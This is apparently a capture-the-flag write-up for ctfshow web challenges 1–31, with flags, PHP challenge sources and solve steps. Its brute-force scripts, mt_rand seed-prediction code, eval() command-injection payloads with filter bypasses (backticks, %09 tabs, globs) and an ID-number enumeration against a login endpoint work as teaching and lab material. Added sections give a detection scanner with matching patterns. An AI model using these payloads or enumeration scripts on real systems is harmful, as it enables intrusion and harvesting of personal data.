
Information Gathering

web1[html]

View the page source


ctfshow{874c4342-435b-40e6-96a7-b37ddf723161}

web2[html]

Right-click is disabled; just press Ctrl+U, or prefix the URL in the address bar with view-source:


ctfshow{a3bc8e02-09ce-4cc2-a429-72bd55d9b3f0}

web3[header]

Inspect the HTTP traffic


ctfshow{823de946-8869-473e-8a99-82ca91f4085b}

web4[robots.txt]

Check robots.txt

Tip: save this as a bookmarklet so it can be opened quickly: javascript:window.location = document.location.protocol + "//" + document.location.host + "/robots.txt";


ctfshow{12de0686-8909-4772-a2b6-b05c55b74215}

web5[.phps]

Visit ./index.phps


ctfshow{07083375-5d54-4ca9-8fcf-001f8c8cba32}

web6[www.zip]

Visit ./www.zip


The archive contains fl000g.txt, so visit ./fl000g.txt


ctfshow{1034d16a-721d-4805-83a7-0446a9aa0e5c}

web7[.git/]

Visit ./.git/


ctfshow{63f0f59c-697d-48de-bd60-d9da6f49c7d5}

web8[.svn/]

Visit ./.svn/


ctfshow{daf35dcb-81bf-43a0-8d79-797f16e84555}

web9[.swp]

Visit ./index.php.swp


ctfshow{d3d4c281-86c4-464b-a2ae-6fa6d01b2907}

web10[cookie]

Check the cookies; I used the Web Developer extension for this


ctfshow{afbdb2ad-1b92-4f2b-ac21-b3c3358a7500}

web11[domain TXT record]

nslookup -qt=TXT ctfshow.com


flag{just_seesee}

web12[social engineering]

Visit ./admin/; it requires a login. Guess the username admin and, for the password, the number 372619038 shown at the bottom of the home page


ctfshow{e5c0e24d-f03d-4df9-b4db-3b3f3734fc53}

web13[site template]

There is a documentation link at the bottom of the page


Following the documentation, visit ./system1103/login.php and log in with admin/admin1103


ctfshow{463d8523-8432-4297-b738-27d9fb837068}

web14[KindEditor 4.1.11]

Precondition for the vulnerability: the configured file-space directory does not exist

Visit ./editor/, click "Insert file", choose "File space", and the flag is listed at /var/www/html/nothinghere/fl000g.txt


So visit ./nothinghere/fl000g.txt


ctfshow{04cc465c-cbf8-4244-824a-284c038f66f5}

web15[social engineering]

Visit ./admin/; there is a "forgot password" function


Look up the QQ number taken from the QQ e-mail address at the bottom of the home page; the profile shows Shaanxi, Xi'an, Xincheng District


Try them one by one; the answer "西安" (Xi'an) resets the password to admin7789. Log in


ctfshow{f2779cd5-a648-4ac4-bd00-4f38437d7aad}

web16[PHP probe]

Visit ./tz.php; a PHP probe page is there


Find the phpinfo option


ctfshow{5462980d-256a-470a-a818-b9e19ab09fc6}

web17[DNS history]

Use any site that offers IP history lookups; I used https://viewdns.info/iphistory/

Exclude the previous owner's records and the provider's overseas records; the first remaining IP is, in the usual case, the real IP


flag{111.231.70.44}

web18[js]

Look at the JS; there is a score check


Run it in the console to get the hint 110.php


ctfshow{326d5b86-f2f6-4b58-a63f-5c4017a1dcfe}

web19[source comments]

Look at the HTML: a comment was left in, which gives the account admin. The password, however, is clearly encrypted


Scroll up to the code that builds the POST: it is AES-CBC, and both the key and the IV are given, so just decrypt


Log in with the decrypted password


ctfshow{ae62164b-4665-4385-99c3-2637a245f6c6}

web20[.mdb]

Visit ./db/db.mdb to find the database file


flag{ctfshow_old_database}

Brute Force

web21[Base Auth]

Just brute-force it with Burp. Note that Burp's result filter does not refresh automatically; re-apply the filter manually


ctfshow{67950f5e-5f73-4ed1-a3b4-3f6b176784fd}

web22[subdomain]

This challenge is broken; I will come back to it later

web23[PHP basics]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 11:43:51
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 11:56:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);

include('flag.php');
if(isset($_GET['token'])){
    $token = md5($_GET['token']);
    if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
        if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

Write a script to brute-force it

<?php
function fuck() {
    foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $i){
    foreach (str_split("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") as $j){
        $Gtoken = $i.$j;
        $token = md5($Gtoken);
        if(substr($token, 1,1)===substr($token, 14,1) && substr($token, 14,1) ===substr($token, 17,1)){
            if((intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1)===intval(substr($token, 31,1))){
                return $Gtoken;
            }
        }
    }
    }
    return "";
}

echo fuck();
// ZE


ctfshow{f16c4894-48b4-41dd-bf26-e6c3a45a8af8}

web24[mt_srand]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:26:39
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 13:53:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(372619038);
    if(intval($r)===intval(mt_rand())){
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}

?>
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021

(The kernel line appears twice because system() prints the command output itself and echo then prints its return value, which is the last line of that output.)

PHP's mt_rand() values are derived deterministically from the seed, so knowing the seed is equivalent to knowing the entire subsequent random sequence.

<?php
mt_srand(372619038);
echo mt_rand();
//1155388967


web25[mt_srand]

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-03 13:56:57
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-03 15:47:33
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include("flag.php");
if(isset($_GET['r'])){
    $r = $_GET['r'];
    mt_srand(hexdec(substr(md5($flag), 0,8)));
    $rand = intval($r)-intval(mt_rand());
    if((!$rand)){
        if($_COOKIE['token']==(mt_rand()+mt_rand())){
            echo $flag;
        }
    }else{
        echo $rand;
    }
}else{
    highlight_file(__FILE__);
    echo system('cat /proc/version');
}
Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021 Linux version 4.15.0-134-generic (buildd@lgw01-amd64-035) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #138-Ubuntu SMP Fri Jan 15 10:52:18 UTC 2021

Request ./?r=0; the response is the negated first mt_rand() value, so the first mt_rand() is 748251799


Then use php_mt_seed to brute-force the seed


That gives six candidate seeds, corresponding to different PHP environments. Since my PHP 7 computation in the previous challenge was fine, I verify them under PHP 7.

<?php
function fuck($i){
    mt_srand($i);
    $f = mt_rand();
    if ($f == 748251799){
        return mt_rand()+mt_rand();
    }
}

echo fuck(1448670724)."\n";
echo fuck(1448670725)."\n";
echo fuck(575534922)."\n";
echo fuck(608125702)."\n";
echo fuck(2575729271)."\n";
echo fuck(2656555094)."\n";
//3356577139
//1337536129
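PHP's mt_rand() is MT19937; on PHP 7.1 and later (the default MT_RAND_MT19937 mode) a call with no arguments returns the generator's 32-bit output shifted right by one bit, and older versions used a slightly different twist step, which is why php_mt_seed reports candidate seeds per PHP version. The block below is an added illustration for the web24 and web25 sections, not code from the write-up: it reimplements that generator in Python so the determinism stated under web24 and the seed-verification step under web25 can be seen directly (same seed, same sequence; once a candidate seed reproduces the observed first value, the next two outputs that form the web25 token follow). The class and function names are my own; the cross-check loads the same 624-word state into CPython's random module, which uses the same generator.

```python
import random

N, M = 624, 397
MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF


def mt19937_state(seed):
    """Standard MT19937 init_genrand(); PHP's php_mt_initialize() does the same."""
    mt = [seed & 0xFFFFFFFF]
    for i in range(1, N):
        prev = mt[i - 1]
        mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
    return mt


class MT19937:
    """Minimal MT19937 core: the generator behind PHP's mt_rand() (7.1+ default mode)
    and CPython's random module."""

    def __init__(self, seed):
        self.mt = mt19937_state(seed)
        self.index = N  # force a twist before the first output

    def _twist(self):
        mt = self.mt
        for i in range(N):
            y = (mt[i] & UPPER) | (mt[(i + 1) % N] & LOWER)
            mt[i] = mt[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)
        self.index = 0

    def next_u32(self):
        if self.index >= N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        # tempering
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def php_mt_rand_sequence(seed, count):
    """mt_rand() values for a seed, PHP 7.1+ style: each 32-bit output shifted right by one."""
    gen = MT19937(seed)
    return [gen.next_u32() >> 1 for _ in range(count)]


def token_after(seed, observed_first):
    """Python counterpart of the PHP verification script above: if a candidate seed
    reproduces the observed first mt_rand(), return mt_rand()+mt_rand() (the web25
    cookie token); otherwise None."""
    first, second, third = php_mt_rand_sequence(seed, 3)
    if first != observed_first:
        return None
    return second + third


def matches_cpython(seed, count=10):
    """Cross-check this implementation against CPython's MT19937 by loading the same
    624-word state into random.Random and comparing raw 32-bit outputs."""
    ref = random.Random()
    ref.setstate((3, tuple(mt19937_state(seed)) + (N,), None))
    mine = MT19937(seed)
    return all(mine.next_u32() == ref.getrandbits(32) for _ in range(count))


if __name__ == "__main__":
    seed = 372619038  # the seed hard-coded in the web24 challenge
    print("cross-check vs CPython:", matches_cpython(seed))
    print("first mt_rand() values:", php_mt_rand_sequence(seed, 3))
```

Compare php_mt_rand_sequence(372619038, 1) with the value shown under web24 to confirm which PHP mode the challenge ran in. The defensive takeaway of both challenges is that a seeded mt_rand() must never back a token or check value a client is not supposed to predict; PHP's random_int() and random_bytes() are the CSPRNG alternatives.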

Then set the cookie and visit ./?r=748251799; with token=3356577139 the flag is returned


ctfshow{38496b53-16d2-40de-b529-af298b6c4b4a}

web26[packet capture]


This one is odd: just capturing the request is enough


ctfshow{a0bd74a4-1739-4053-bb15-0a35f5bef6b7}

web27[account collection]


It turns out to be an academic-affairs system. My first thought was whether the publicly listed student information below could be used to obtain an account and password directly


Then I tried using the ID number's check digit to enumerate valid ID numbers


import requests


def checkIDNumber(num_str):
    # Validate the check digit (ISO 7064 MOD 11-2) of an 18-character ID number:
    # the weight of position i is 2**(17-i) mod 11, and the 18th character encodes
    # the weighted sum mod 11 (10 is written as 'X').
    str_to_int = {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5,
                  '6': 6, '7': 7, '8': 8, '9': 9, 'X': 10}
    check_dict = {0: '1', 1: '0', 2: 'X', 3: '9', 4: '8', 5: '7',
                  6: '6', 7: '5', 8: '4', 9: '3', 10: '2'}
    assert len(num_str) == 18
    check_num = 0
    for index, num in enumerate(num_str):
        if index == 17:
            right_code = check_dict.get(check_num % 11)
            return num == right_code
        check_num += str_to_int.get(num) * (2 ** (17 - index) % 11)


if __name__ == '__main__':
    # Region prefix and sequence suffix come from the published record; only the
    # birth date is unknown, so enumerate dates and keep the ones whose check digit
    # is valid. The checksum alone does not reject impossible dates such as 02-30,
    # so a few of the requests are wasted.
    for year in range(1990, 2000):
        for month in range(1, 13):
            for day in range(1, 32):
                num_str = '621022' + str(year) + ("0" + str(month))[-2:] + ("0" + str(day))[-2:] + '5237'
                if checkIDNumber(num_str):
                    data = {
                        'a': '高先伊',
                        'p': num_str,
                    }
                    r = requests.post("http://9b942f9a-035b-41a3-9a76-2519aec7e97e.chall.ctf.show:8080/info/checkdb.php", data=data).json()
                    if r['0'] != "error":
                        print(num_str)


ctfshow{02c2feb9-db89-44c6-9e81-eec7c6e50d77}

web28[directory brute force]

This one had me confused at first: I knew it was about brute-forcing a file location, but that is a needle in a haystack. There was no hint when I did it, and I tried three or four path formats before one worked. Now you can simply brute-force using the format the hint gives

from requests import get

def fuck():
    for i in range(0, 100):
        for j in range(0, 100):
            print(i, j)
            if get(f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/", allow_redirects=False).status_code != 403:
                return f"http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/{i}/{j}/"

if __name__ == '__main__':
    print(fuck())
# http://d9773c5c-6f71-49ac-b19d-5237a0c9d268.chall.ctf.show:8080/72/20/


ctfshow{60b39b18-e70c-4cd0-a5e4-7deb336af1f6}

Command Execution

web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

There are many ways to do this; here are two. (Because of how the browser parses HTML, the PHP source echoed back in the response is treated as a comment and hidden, so always look at the raw HTML to make sure you are seeing the real response.)

// payload
List files
/?c=echo%20`ls`;
/?c=eval($_GET['d']);&d=echo `ls`;
Read the file
/?c=echo `cat fla*`;
/?c=echo `cat fla?.php`;
/?c=eval($_GET['d']);&d=echo `cat flag.php`;

ctfshow{1d5d8d07-8623-4437-80f2-5a2454b9f36d}

web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

The payloads from the previous challenge work here unchanged, because backticks were used in place of system; as for the filter on "php" in the filename, two of the payloads above do not contain "php" at all.

ctfshow{bb6d3fc9-9491-46bd-884b-1c7a4fd2c15f}

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

This one also filters the space and the single quote, so none of the payloads above work any more. Not a big problem: the tab character %09 can stand in for the space.

// payload
List files
/?c=echo%09`ls`;
Read the file
/?c=echo%09`/bin/ca*%09fla*`;
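As a defender's counterpart to web29 to web31 (an added example, not part of the write-up): the three challenges show that a keyword denylist in front of eval() cannot be made complete, since PHP decodes the query before the regex runs and the attacker just swaps system for backticks, a space for a tab, and the filename for a glob. The fix is never to pass request data to eval(); detection, meanwhile, should work on decoded parameter values and look for the shapes these payloads leave behind. The Python scanner below does that over constructed common-log-format lines that mirror the payloads above; the log lines, indicator names and function names are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in common log format, modelled on the payload shapes
# discussed above. They are not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2021:10:00:01 +0800] "GET /?c=echo%20%60ls%60; HTTP/1.1" 200 512
10.0.0.5 - - [10/Feb/2021:10:00:02 +0800] "GET /?c=eval($_GET['d']);&d=echo%20%60cat%20flag.php%60; HTTP/1.1" 200 640
10.0.0.5 - - [10/Feb/2021:10:00:03 +0800] "GET /?c=echo%09%60/bin/ca*%09fla*%60; HTTP/1.1" 200 640
10.0.0.9 - - [10/Feb/2021:10:00:04 +0800] "GET /?page=about HTTP/1.1" 200 2048
10.0.0.9 - - [10/Feb/2021:10:00:05 +0800] "GET /robots.txt HTTP/1.1" 200 40
"""

# client, method and request target of one access-log entry
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Indicators are matched against the *decoded* value of every query parameter,
# so encodings such as %60 (backtick) or %09 (tab) do not hide them.
INDICATORS = {
    "backtick_exec": re.compile(r"`"),                          # shell-exec operator
    "nested_eval": re.compile(r"\beval\s*\("),                   # eval() inside a parameter
    "superglobal_in_param": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "tab_as_space": re.compile(r"\t"),                           # %09 where a space is filtered
    "glob_wildcard": re.compile(r"\w[*?]"),                      # fla*, fla?, /bin/ca*
    "flag_file_reference": re.compile(r"\bflag\b|fla[*?]", re.I),
}


def decode_query_params(target):
    """Return [(name, decoded_value)] for the query string of a request target."""
    query = urlsplit(target).query
    params = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        params.append((unquote(name), unquote(value.replace("+", " "))))
    return params


def scan_line(line):
    """Return a finding for a log line whose parameters carry injection indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    found = set()
    for _name, value in decode_query_params(m.group("target")):
        for label, pattern in INDICATORS.items():
            if pattern.search(value):
                found.add(label)
    if not found:
        return None
    return {"client": m.group("client"), "target": m.group("target"), "indicators": sorted(found)}


def scan_log(text):
    """Scan every line of an access log and return the findings in order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["target"], ", ".join(finding["indicators"]))
```

A single indicator such as a backtick is enough to alert on for an endpoint that should never receive code, and the combination seen on the third constructed line (tab plus glob plus backtick) is a strong sign of filter evasion rather than noise.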

To be Continued
